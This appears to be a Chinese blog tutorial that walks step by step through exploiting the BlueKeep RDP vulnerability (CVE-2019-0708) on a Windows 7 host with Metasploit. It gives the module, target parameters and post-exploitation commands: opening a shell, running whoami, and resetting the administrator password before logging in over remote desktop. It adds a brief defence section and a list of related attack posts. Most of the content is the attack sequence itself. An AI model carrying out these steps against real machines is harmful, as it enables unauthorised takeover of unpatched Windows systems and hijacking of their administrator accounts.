白帽子黑客与网络安全工程师带你:远程桌面漏洞利用与Windows7计算机攻防实战

最新推荐文章于 2024-03-28 09:56:05 发布
最新推荐文章于 2024-03-28 09:56:05 发布
阅读量401 收藏 2
点赞数
分类专栏: 科技 黑客 IT技术 文章标签: 网络 计算机视觉 信息安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao1234oaix/article/details/109034796
版权
黑客 同时被 3 个专栏收录
192 篇文章 31 订阅
订阅专栏
科技
187 篇文章 10 订阅
订阅专栏
IT技术
173 篇文章 3 订阅
订阅专栏

一、课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络攻防干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
二、战略安排
2.1 打开Metasploit渗透框架,如下如所示。
命令:msfconsole
在这里插入图片描述

2.2 检索有关远程桌面的已知漏洞,如下图所示。
命令:search 0708
在这里插入图片描述

2.3 使用检索到的关于远程桌面的漏洞利用模块,如下图所示。
命令:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
在这里插入图片描述

2.4 查看攻击目标需要设置的参数,如下图所示。
命令:show targets
在这里插入图片描述

2.5 设置相关攻击参数,如下图所示。
命令:set rhosts 192.168.0.106
set lhost 192.168.0.102
set target 4
在这里插入图片描述
在这里插入图片描述

2.6 执行漏洞攻击模块,如下图所示。
命令:run
在这里插入图片描述
在这里插入图片描述

2.7 利用建立起来的会话查看受害者主机系统的相关信息,如下图所示。
命令:sysinfo
在这里插入图片描述

2.8 利用建立起来的会话查看受害者主机系统的相关信息,如下图所示。
命令:ipconfig
在这里插入图片描述

2.9 查看会话命令帮助信息,如下图所示。
命令:?
在这里插入图片描述

2.10 进入受害者主机cmd界面并解决乱码问题,如下图所示。
命令:shell
chnp 65001
在这里插入图片描述

2.11 利用“whoami”命令查看相关信息,如下图所示。
命令;whoami
在这里插入图片描述

2.12 利用cmd命令在受害者主机创建一个新用户,如下图所示。
命令:net user administrator 123456
在这里插入图片描述

2.13 利用图形化远程桌面登录工具登录受害者主机,如下图所示。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

2.14 成功利用图形化远程登录工具拿下目标主机,如下图所示。
在这里插入图片描述

2.15 远程桌面漏洞防护措施,如下图所示(关闭远程桌面登录服务、开启防火墙、安装第三方电脑管家等等)。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

辛苦原创,你的每一次评论点赞和关注,都是我们源源不断的创作动力哦!你也可搜索:Kali 与编程,学习更多 Kali Linux 渗透与白帽编程技巧呢!
点我学习完整视频渗透课,预计更新1000节

Kali与编程~
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
网络安全工程师白帽子黑客教你:远程桌面漏洞利用Windows7计算机攻防实战技巧【上】
Kali与编程
10-11 410
一、课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 二、资源装备 1.安装好 Kali Linux 的虚拟机一台 2.Win7 SP1受害者主机一个; 3.整装待发的小白一个。 三、战略安排 3.1 搭建受害者主机环境,如下图所示。 3.1.1 受害者主机基本信息介绍,如下图所示。 3.1.2 受害者主机下载教程,如下图所示。 网站:MSDN 步骤:打开网站、选择操作系统、选择Windows
远程桌面漏洞poc_【漏洞复现】CVE 2019-0708 漏洞利用
weixin_39625305的博客
11-18 178
0x00 前言 2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。以上内容来自360网络安全响应中...
远程控制——ms12-020漏洞利用(蓝屏攻击)
wwwwyyyrre的博客
04-22 1134
(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞),远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。官方补丁地址:https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-020。
远程控制——ms12-020漏洞利用
Coffilater的博客
12-01 5618
简单介绍Metaspoit Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。Metasploit还提供了一系列可直接运行的功能程序,支持渗透测试者与安全研究人员快速地利用Metasploit框架内部能力完成一些特定任务。比如msfpayload、msfencode和msfvenom可以将攻击载荷封装为可执行文件、C语言、JavaScript语言等多种形式,并可以进行各种类型的编码。
第8节 破解系统密码—利用win7漏洞和PE系统破解密码
m0_64378913的博客
12-10 4369
本节所述的破解系统密码主要包括利用win7漏洞绕过系统登录密码以及利用PE系统破解windows系统开机密码。利用win7漏洞绕过系统登录密码需要windows系统存在漏洞才可以,若已修复则失效。而利用PE系统破解win系统开机密码需要插入U盘,但是无论计算机系统本身有无漏洞,都可以通过PE系统打开计算机,从而修改密码。
吴翰清:白帽子讲Web安全
02-21
安全宝副总裁、前阿里巴巴集团高级安全专家吴翰清将携他的《白帽子讲Web安全》一书做客问答栏目。以下为采访正文:吴翰清(刺哥/总,大风哥),安全宝副总裁,前阿里巴巴集团高级安全专家。毕业于西安交通大学少年班...
白帽子网络安全.pdf
09-19
白帽子网络安全.pdf
信息安全_新形势下的白帽子成长与漏洞发现报告机制探讨.pptx
08-14
从中国面临的网络安全威胁入手,结合我国的相关法律现状,分析白帽子的漏洞发现报告机制,探讨新法实施来的机遇和挑战;以补天为例,探讨网络安全人才培养的新方向,新模式,新思维,正面引导、培养网络安全人才,...
白帽子讲浏览器安全.钱文祥(详细书签).pdf
03-08
1.6 “白帽子”与浏览器厂商的联手协作 9 1.7 全书概览 10 1.8 本章小结 12 2 浏览器中常见的安全概念 13 2.1 URL 13 2.1.1 URL的标准形式 15 2.1.2 IRI 16 2.1.3 URL的“可视化”问题——字形欺骗钓鱼攻击 ...
专访 _ TSRC:与白帽子共同成长 守护网络安全与和平.pdf
09-18
专访 _ TSRC:与白帽子共同成长 守护网络安全与和平 系统安全 大数据 大数据 信息安全 安全管理
windows漏洞利用
zhaji001
09-13 2866
编译运行 源代码: #include <stdio.h> greeting(char *temp1, char *temp2){ char name[400]; strcpy(name, temp2); printf("Hello %s %s\n", temp1, temp2); } main(int argc, char *argv[]){ greeting(ar...
利用windows7漏洞破译开机密码
SJTU_liangge的博客
02-09 189
1.在计算机启动时断电,再次开机来到选择修复界面,选择启动修复。 2.弹出使用系统还原时选择取消。 3.弹出无法修复时,打开隐藏问题详细信息: 4.选择阅读隐私声明: 5.选择文件>打开: 接下来在C:\windows\system32目录下找到粘滞键程序,将其重命名,并将cmd程序复制一份重命名为粘滞键程序。 将sethc更名为sethc_new 将cmd复制一份重命名为sethc 6.接下来点击完成,重启电脑。 来到登录界面,连续按下5次shift,弹出cmd。 使用 net us
十分钟利用windows7漏洞破解开机密码
Beau_Will的博客
02-20 2732
所有win7系统都使用 首先连按五下Shift键弹出粘滞键提醒 然后我们点击否后关机 启动系统时将其强制关机,虚拟机利用电源关闭虚拟机,自用主机就在开机时长按关机键强制关闭系统,随后启动系统,我们选择启动启动修复(推荐) 选择取消即不还原 等待数分钟(我们这里没有系统问题,系统它查不出任何问题) 打开如下箭头 点击这个.txt文件 选择文件,点击另存为 找到系统盘中System32文件中的sethc文件(下方保存类型勾选“所有文件”才能看见文件),将其重...
网络安全工程师演示:黑客是如何进行Windows7计算机攻防实战?(准备篇)
Kali与编程
11-14 332
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者
利用kali Linux 渗透windows 操作系统
YJlio的博客
03-05 7432
利用kali Linux 渗透windows 操作系统 一、实验目的:使用kali生成木马,渗透windows系统 二、实验内容: 使用kali中的Metasploit生成木马,控制windows系统 三、实验环境 需要从VMware Workstation 中创建两台虚拟机 一台kali linux和一台靶机windows系统 1、攻击者ip(kali) 192.168.63.21 2、靶机ip(windows)192.168.63.20 四、实验步骤 先将虚拟机的网络模式修改为桥接模
kali上使用msf渗透win7(永恒之蓝操作复现)初学者指南
热门推荐
weixin_45596770的博客
04-18 1万+
首先开篇先放出我使用的kali 与 win7 的网盘链接: 大家VMware上新建虚拟机即可~ 简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~ 1. Metasploit初始化 在使用之前我们需要对Metasploit进行初始化,并启动: 终端窗口的命令行输入如下命令 systemctl start postgresql systemctl enable postgresql 启动专用的数据库,并设置为每次开机自动启动 msfconsole 或者 点击kali
Kali远程操纵win7
最新发布
2301_81475812的博客
03-28 522
攻击方:kali IPV4:192.168.92.133被攻击方:win7 IPV4:192.168.92.130。
Metasploit渗透测试指南
willow_liang的博客
12-07 2472
目录 1.Metasploit与nmap 1.将Nmap输出的结果导入metasploit ​2.在msf中使用nmap ​2.针对性扫描 1.SMB服务器消息块协议扫描 ​2.搜寻配置不当的Mircrosoft SQL Server ​3.ssh服务扫描 ​4.FTP扫描 5.简单网络管理协议扫描 ​6.NetBIOS协议扫描 漏洞扫描 使用Nessus扫描 专用漏洞扫描器——1.验证SMB登录 ​2.扫描开放的VNC虚拟网络计算空口令 3.扫描开放的X11服务器 渗透攻击
漏洞又来! windows远程桌面服务远程执行代码漏洞
shipinginfo的博客
05-16 5495
声明:本文引用翻译来源于微软官网(链接查看:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708) 远程桌面服务(以前称为终端服务)中存在远程执行代码漏洞CVE-2019-0708修复程序,当未经身份验证的攻击者使用RDP连接到目标系统并发送特制请求时。此漏洞是预身份验证,无需用...
护网,攻击方和防守方的方案介绍详细内容
12-05
本文档详细介绍了网络安全实战攻防演习中的防守方案,主要针对参与护网行动的蓝队,包括攻防演习的背景、核心安全风险分析以及防守工作的四个阶段,旨在帮助防守方做好充分准备,有效抵御红队的攻击。 在攻防演习中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kali与编程~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值